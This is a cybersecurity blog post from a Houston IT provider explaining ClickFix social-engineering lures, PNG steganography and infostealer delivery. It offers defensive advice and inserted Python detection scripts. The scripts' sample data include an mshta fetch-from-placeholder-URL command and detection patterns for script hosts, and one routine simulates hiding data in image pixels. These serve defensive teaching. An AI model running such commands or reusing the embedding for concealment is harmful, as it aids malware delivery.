Shane

ClickFix Malware Gets Creative: How Cybercriminals Hide Threats Inside Innocent Images

When Images Attack: The Hidden Malware Your Antivirus Cannot See – Understanding How ClickFix Attacks Use Images To Conceal Malware

TL;DR:
ClickFix is a dangerous social engineering attack that tricks users into pasting malicious commands through fake robot verification pages or Windows Update screens. Attackers now hide malware inside PNG images using steganography, making detection extremely difficult while deploying data-stealing malware.

Houston businesses face an increasingly sophisticated threat that blends old-school trickery with cutting-edge concealment techniques. Security researchers at Huntress recently published detailed findings on ClickFix – a clever social engineering approach that convinces unsuspecting employees to become unwitting accomplices in their own system compromise. What makes the campaigns Huntress uncovered particularly concerning is the addition of steganography – the art of hiding malicious code directly within the pixel data of ordinary-looking images.

The attack doesn’t rely on exploiting software vulnerabilities or bypassing firewalls. Instead, it exploits something far harder to patch: human trust and the assumption that familiar interfaces like robot verification boxes and Windows Update screens are legitimate.

Understanding the ClickFix Attack
ClickFix works by presenting victims with convincing fake web pages that request user interaction. Security researchers have identified two primary lure variants currently targeting businesses:
  • Robot Verification Lures: Fake CAPTCHA or “human verification” pages instruct users to press Win+R to open the Windows Run box, then Ctrl+V to paste a command that was secretly copied to their clipboard
  • Fake Windows Update Screens: A newer variant displays a full-screen Windows Update animation that appears completely legitimate, eventually prompting users to paste a malicious command to “complete” the update
  • Clipboard Hijacking: When victims visit these malicious sites, JavaScript automatically copies a harmful command to their clipboard without their knowledge
  • Multi-Stage Execution: The initial command triggers a complex chain of events that ultimately installs information-stealing malware

The fake Windows Update lure is particularly effective because it mimics Microsoft’s actual update interface so closely that even cautious users might be fooled. The screen enters full-screen mode, displays realistic “Working on updates” animations, and only reveals its true nature at the very end.

(Human Verification Lure – Source: Huntress)

The Steganography Twist

What sets this campaign apart from typical malware distribution is the use of steganography to conceal the final malicious payload. Rather than simply attaching malware to a file or downloading it from a suspicious server, the attackers encode their payload directly into the pixel data of PNG images.

  • Pixel-Level Concealment: The malicious code is embedded within specific color channels of image pixels, making it invisible to the naked eye and most security tools
  • Memory-Only Extraction: The shellcode is extracted and decrypted entirely in memory, leaving minimal traces on disk for forensic analysis
  • AES Encryption: The embedded images themselves are encrypted within the malware loader, adding another layer of protection against detection
  • Custom Algorithm: Attackers use a proprietary steganographic algorithm that reads specific color channel data to reconstruct the hidden payload

This technique effectively bypasses signature-based security solutions that scan for known malware patterns. The images appear completely benign during transit and storage.
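To make the "pixel-level concealment" point concrete from the defender's side, here is an added example (not code from this post or from Huntress) that scores each color channel's least-significant-bit plane by Shannon entropy. The image is a constructed smooth gradient, and the "payload" is random bytes standing in for an encrypted blob; Pillow is assumed as the way a real PNG would be turned into the (r, g, b) list, but the script itself needs only the standard library.

```python
"""Per-channel LSB-plane entropy check for RGB pixel data.

Added example, not code from the CinchOps post or from Huntress. It works on a
plain list of (r, g, b) tuples so it runs offline with only the standard
library; decoding a real PNG into that list (for example with Pillow's
Image.open(path).convert("RGB").getdata()) is assumed to happen beforehand.
"""
import math
import random
from collections import Counter

CHANNELS = ("R", "G", "B")


def make_cover(width=128, height=128):
    """Constructed 'clean' image: smooth gradients in every channel. Its low-order
    bits are highly structured, which is exactly what a sequential LSB embed erases."""
    pixels = []
    for y in range(height):
        for x in range(width):
            pixels.append(((x + y) // 2, (x * 2) % 256, (y * 2) % 256))
    return pixels


def embed_lsb(pixels, channel, payload):
    """Simulate the concealment pattern described above: write `payload` bit by
    bit into the least-significant bit of one channel. Used here only to build
    test data; the payload is random bytes standing in for an encrypted blob."""
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("payload does not fit in the image")
    out = list(pixels)
    for idx, bit in enumerate(bits):
        px = list(out[idx])
        px[channel] = (px[channel] & 0xFE) | bit
        out[idx] = tuple(px)
    return out


def lsb_plane_bytes(pixels, channel):
    """Pack the least-significant bit of one channel, pixel by pixel, into bytes."""
    bits = [px[channel] & 1 for px in pixels]
    packed = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        packed.append(byte)
    return bytes(packed)


def shannon_entropy(data):
    """Shannon entropy in bits per byte (0.0 for constant data, up to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def analyze(pixels, threshold=7.0):
    """Score each channel's LSB plane; channels at or above `threshold` look like
    random data, i.e. a candidate carrier for an encrypted payload."""
    scores = {name: shannon_entropy(lsb_plane_bytes(pixels, i))
              for i, name in enumerate(CHANNELS)}
    flagged = [name for name, e in scores.items() if e >= threshold]
    return scores, flagged


def demo():
    """Score the constructed cover before and after hiding 2048 random bytes in
    the blue channel. Returns ((clean_scores, clean_flags), (stego_scores, stego_flags))."""
    cover = make_cover()
    rng = random.Random(7)
    payload = bytes(rng.getrandbits(8) for _ in range(2048))
    stego = embed_lsb(cover, 2, payload)
    return analyze(cover), analyze(stego)


if __name__ == "__main__":
    for label, (scores, flagged) in zip(("clean", "stego"), demo()):
        print(label, {k: round(v, 2) for k, v in scores.items()}, "flagged:", flagged)
```

Two caveats when applying this outside the toy image. First, the post notes that the carrier images are themselves AES-encrypted inside the loader, so the check only makes sense on the decrypted image (recovered from memory or from the decrypted resource), not on the encrypted blob at rest. Second, real photographs already have fairly noisy low-order bits, so a fixed 7.0 threshold will over-alert; calibrate on known-clean images, and prefer a pairs-of-values chi-square test (Westfeld and Pfitzmann) when you need something more robust than raw entropy.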

(Decrypted Image Containing Shellcode – Source: Huntress)

The Complete Attack Chain

Once a victim pastes and runs the malicious command, a sophisticated multi-stage infection process begins:

  • Stage 1: The command uses mshta.exe to download and execute a JScript payload from an attacker-controlled server
  • Stage 2: Heavily obfuscated PowerShell, padded with junk instructions to confuse analysis, downloads and decrypts a .NET assembly
  • Stage 3: The .NET assembly extracts encrypted PNG images from its resources and uses the steganographic algorithm to pull shellcode from the pixel data
  • Stage 4: A secondary .NET assembly is compiled on-the-fly to perform process injection, inserting the malicious code into legitimate Windows processes like explorer.exe
  • Stage 5: The final payload – either LummaC2 or Rhadamanthys infostealer – executes within the trusted process

Each stage includes obfuscation techniques such as 10,000 empty function calls, extremely long variable names, and encrypted configuration strings to hinder security analysis.

(Windows Run Prompt output for the Human Verification Lure – Source: Huntress)

The Malware Payloads

The ClickFix campaigns have been observed delivering two dangerous information-stealing malware variants:

  • LummaC2: A capable infostealer that targets browser credentials, cryptocurrency wallets, and sensitive files while communicating with multiple command-and-control servers
  • Rhadamanthys Stealer: A sophisticated infostealer that harvests credentials, cookies, and financial data, recently targeted by law enforcement in Operation Endgame
  • Persistent Threat: Despite law enforcement action against Rhadamanthys infrastructure in November, the distribution infrastructure for these campaigns remained active, demonstrating the resilience of the threat actors

Both malware families can cause significant damage to businesses through credential theft, financial fraud, and data exfiltration.

(Fake Windows Update Lure – Source: Huntress)

Who Is Behind These Attacks?

While specific attribution remains difficult, analysis of the ClickFix lure source code reveals some interesting details:

  • Russian Language Comments: The fake Windows Update lure contains comments written in Russian, suggesting the threat actors may be Russian-speaking
  • Consistent Infrastructure: Multiple campaigns traced back to specific IP addresses and domain clusters indicate organized, ongoing operations
  • Active Development: The evolution from simple robot verification lures to sophisticated fake Windows Update screens demonstrates continued investment in the attack methodology
  • Evasion Focus: The emphasis on steganography and multi-stage execution shows threat actors prioritizing detection avoidance

The campaigns have been active since at least October 2025, with researchers tracking multiple clusters of related activity.

(Diagram Depicting the Execution Chain Leading to LummaC2 – Source: Huntress)

Who Is At Risk?

Any organization with employees who access the internet faces potential exposure to ClickFix attacks:

  • Small and Medium Businesses: Often lack dedicated security teams to identify and respond to sophisticated social engineering attacks
  • Remote Workers: May encounter malicious sites while working outside corporate network protections
  • Customer-Facing Staff: Employees who regularly interact with external websites and email links present higher risk
  • Financial and Healthcare Organizations: High-value targets for information-stealing malware due to sensitive data access
  • Any Windows Environment: The attacks specifically target Windows systems through the Run dialog functionality

The attack requires no special access or elevated privileges – any employee with standard Windows access can become a victim.

 Recommended Protections

Organizations can implement several measures to defend against ClickFix and similar attacks:

  • Disable the Windows Run Box: Apply registry modifications or Group Policy settings to prevent users from accessing Win+R functionality: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  • Security Awareness Training: Educate employees that legitimate CAPTCHA verification and Windows Update processes never require pasting commands into the Run dialog
  • Monitor Process Lineage: Configure EDR solutions to alert on suspicious process chains, particularly explorer.exe spawning mshta.exe or PowerShell
  • Audit RunMRU Registry: During incident investigation, check HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for evidence of executed commands
  • Web Filtering: Block access to known malicious domains and suspicious newly-registered sites
  • Endpoint Detection: Deploy solutions capable of detecting in-memory threats and anomalous process behavior

The most effective defense combines technical controls with user education, as the attack fundamentally relies on user interaction.
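Two of the checks in the list above, process-lineage monitoring and the RunMRU audit, are easy to show in code. The following is an added example and not CinchOps' or Huntress' tooling: it runs a lineage rule over constructed process-creation events and decodes a constructed RunMRU export. On a live host the events would come from your EDR or Sysmon export and the RunMRU values from winreg (assumed, not shown); the URL in the samples is a placeholder, not an indicator from the campaign.

```python
"""Lineage rule and RunMRU decoder from the protections list.

Added example, not CinchOps' or Huntress' code. Both functions take plain
Python data so they run anywhere; reading live events (EDR/Sysmon) and the
live registry (winreg) is assumed to happen before calling them.
"""
import re
from pathlib import PureWindowsPath

# Child images that a user pasting into the Run box should not normally launch
# straight from the shell; the post names mshta.exe and PowerShell.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}

# Constructed events in a Sysmon-like shape; the URL is a placeholder, not a real IoC.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://placeholder.invalid/verify"},
    {"pid": 4188, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "command_line": '"C:\\Program Files\\Mozilla Firefox\\firefox.exe"'},
    {"pid": 4202, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile"},
    {"pid": 4230, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

# Constructed RunMRU export: slots a, b, c hold commands with the usual trailing
# "\1" marker, and MRUList orders the slots most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "mshta https://placeholder.invalid/verify\\1",
}


def basename(image_path):
    """Lower-cased file name of a Windows image path (works on any OS)."""
    return PureWindowsPath(image_path).name.lower()


def find_suspicious_lineage(events):
    """Alert on explorer.exe launching a script host, the lineage that a
    Win+R then Ctrl+V paste produces. Returns the matching events."""
    alerts = []
    for ev in events:
        if (basename(ev["parent_image"]) == "explorer.exe"
                and basename(ev["image"]) in SUSPICIOUS_CHILDREN):
            alerts.append(ev)
    return alerts


def decode_runmru(values):
    """Return the Run-box history, most recent first, with the trailing '\\1' stripped."""
    history = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


RUNMRU_RED_FLAGS = re.compile(r"^(mshta|powershell|pwsh|cmd)\b|https?://", re.IGNORECASE)


def flag_runmru(history):
    """Pick out Run-box entries that invoke a script host or carry a URL."""
    return [cmd for cmd in history if RUNMRU_RED_FLAGS.search(cmd)]


if __name__ == "__main__":
    for ev in find_suspicious_lineage(SAMPLE_EVENTS):
        print(f"ALERT pid={ev['pid']} explorer.exe -> {basename(ev['image'])}: {ev['command_line']}")
    history = decode_runmru(SAMPLE_RUNMRU)
    print("RunMRU (newest first):", history)
    print("Suspicious Run-box entries:", flag_runmru(history))
```

The lineage rule is deliberately broad: a user opening PowerShell from the Start menu also shows explorer.exe as the parent, so in production add command-line context (a URL, an encoded command, a hidden window) or an allow-list before paging anyone. The RunMRU decoder is the forensic half: because the Run box records what was pasted, the MRUList order tells you which command the victim ran last.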

How CinchOps Can Help

The ClickFix steganography campaign illustrates how modern threats combine social engineering with advanced evasion techniques to bypass traditional security measures. Houston and Katy businesses need a managed IT partner that understands both the technical and human elements of cybersecurity.

CinchOps provides comprehensive protection through:

  • Security Awareness Training: Customized programs that teach employees to recognize social engineering tactics including ClickFix lures and fake system prompts
  • Endpoint Detection and Response: Advanced monitoring that identifies suspicious process behavior and in-memory threats that signature-based tools miss
  • Group Policy Management: Proper configuration of Windows security settings to disable dangerous functionality like the Run dialog where appropriate
  • 24/7 Threat Monitoring: Continuous oversight of your network to detect and respond to emerging threats before they cause damage
  • Incident Response Planning: Preparation and procedures to minimize impact when attacks do occur
  • Network Security Assessment: Evaluation of your current defenses to identify gaps that sophisticated attackers could exploit

Don’t wait for your business to become another ClickFix victim. Contact CinchOps today to discuss how our managed IT support and cybersecurity services can protect your Houston-area business from evolving threats.

For Additional Information on this topic: ClickFix Gets Creative: Malware Buried in Images
